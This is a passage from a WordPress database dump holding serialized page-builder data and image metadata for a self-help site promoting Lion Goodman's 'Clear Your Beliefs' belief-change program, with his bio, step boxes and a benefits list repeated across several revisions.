Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1005, 1516, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:341:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><p>[Form id="10"]<br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:851:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever<br />Is In The Way Right<br/>Now</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:706:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center><p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1007, 1517, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:133:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/AGU_R_ZB540" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:341:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><p>[Form id="10"]<br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:851:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever<br />Is In The Way Right<br/>Now</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:706:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center><p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1009, 1518, '_wp_attached_file', '2014/10/video-shadow.png'),
(1010, 1518, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1020;s:6:"height";i:403;s:4:"file";s:24:"2014/10/video-shadow.png";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"video-shadow-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:24:"video-shadow-300x118.png";s:5:"width";i:300;s:6:"height";i:118;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:24:"video-shadow-220x220.png";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:9:"image/png";}s:15:"product-display";a:4:{s:4:"file";s:24:"video-shadow-400x400.png";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:24:"video-shadow-170x200.png";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:14:"post-thumbnail";a:4:{s:4:"file";s:24:"video-shadow-672x372.png";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1011, 1518, '_edit_lock', '1412907784:2');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1012, 1519, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:316:"<center>\n<p style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/video-shadow.png''); repeat: no-repeat; width:780px;height:471px;padding-top:16px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen></iframe></p>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:341:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><p>[Form id="10"]<br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:851:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever<br />Is In The Way Right<br/>Now</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:706:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center><p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are 